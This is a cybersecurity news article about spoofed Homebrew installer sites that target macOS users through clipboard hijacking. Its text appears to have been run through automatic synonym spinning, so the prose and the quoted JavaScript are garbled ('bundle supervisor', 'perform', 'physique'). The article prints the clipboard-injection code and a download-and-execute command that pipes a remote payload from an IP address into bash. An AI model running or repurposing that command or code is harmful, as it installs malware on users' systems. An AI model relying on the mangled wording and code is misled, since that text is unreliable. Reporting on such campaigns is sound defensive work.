A complicated marketing campaign focusing on macOS customers has emerged via spoofed Homebrew installer web sites that ship malicious payloads alongside reputable bundle supervisor installations.
The assault exploits the widespread belief customers place within the fashionable Homebrew bundle supervisor by creating pixel-perfect replicas of the official brew[.]sh set up web page, full with misleading clipboard manipulation methods.
Safety researchers have recognized a number of fraudulent domains mimicking the reputable Homebrew web site, together with homebrewfaq[.]org, homebrewclubs[.]org, and homebrewupdate[.]org.
These malicious websites current convincing replicas of the official set up interface however incorporate hidden JavaScript designed to inject extra instructions into customers’ clipboards with out their information.
Not like genuine Homebrew pages that enable handbook textual content choice, these spoofed variations drive customers to make the most of a delegated Copy button, enabling attackers to insert malicious payloads alongside commonplace set up instructions.
Homebrew set up web page (Supply – The Sequence)
The marketing campaign represents a major evolution in provide chain assaults, focusing on not the bundle repositories themselves however the preliminary set up course of.
Whereas Homebrew has maintained a powerful safety monitor document with no current compromises, menace actors have found an efficient workaround by impersonating the trusted set up supply.
Spoofed Homebrew set up web page (Supply – The Sequence)
The Sequence analysts recognized this rising menace sample via systematic monitoring of suspicious domains and infrastructure related to identified malware distribution networks.
The assault methodology demonstrates outstanding sophistication in its execution and evasion capabilities.
Quite than compromising reputable bundle repositories, attackers have developed a parallel infrastructure that intercepts customers through the crucial set up section.
This strategy bypasses conventional safety measures centered on repository monitoring whereas exploiting the inherent belief customers place in acquainted set up procedures.
Superior Clipboard Manipulation Strategies
The core an infection mechanism depends on JavaScript-based clipboard manipulation that operates transparently to the sufferer.
When customers click on the Copy button on spoofed websites, embedded code executes a collection of operations designed to inject malicious instructions alongside the anticipated Homebrew set up script.
The JavaScript implementation consists of Russian-language feedback explicitly indicating the place malicious instructions ought to be inserted, suggesting a commodity-style menace service.
The malicious script prevents commonplace textual content choice via occasion listeners that disable contextmenu, selectstart, copy, minimize, and dragstart operations on the set up block.
This forces victims to make use of the supplied Copy button, which triggers the copyInstallCommand() perform. The perform writes a predetermined command to the clipboard utilizing both the trendy Clipboard API or fallback textarea strategies for compatibility throughout completely different browser environments.
const copyCommand = ‘echo ‘; // ← замени на нужную
async perform copyInstallCommand () {
await navigator[.]clipboard[.]writeText (copyCommand);
fetch (‘notify[.]php’, {
technique: ‘POST’,
headers: { ‘Content material-Kind’: ‘utility / json’ },
physique: JSON[.]stringify ({ occasion: ‘copy_install_command’, time: new Date () })
});
}
Evaluation revealed that lively campaigns make the most of instructions reminiscent of curl – s http[:]//185[.]93[.]89[.]62/d/vipx69930 | nohup bash & which downloads and executes extra payloads within the background whereas the reputable Homebrew set up proceeds usually, creating an efficient dual-execution situation that maintains operational stealth whereas establishing persistent entry to compromised techniques.
Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.
